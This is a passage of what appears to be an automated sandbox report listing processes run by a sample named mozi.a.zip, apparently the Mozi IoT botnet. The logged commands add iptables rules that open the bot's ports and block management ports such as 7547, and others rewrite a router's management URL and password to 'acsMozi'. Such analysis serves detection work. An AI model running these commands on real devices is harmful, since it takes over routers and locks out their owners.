                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p tcp --dport 60120 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:16
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:21
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p tcp --dport 58000 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p tcp --dport 35000 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p tcp --dport 50023 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p tcp --dport 7547 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT"
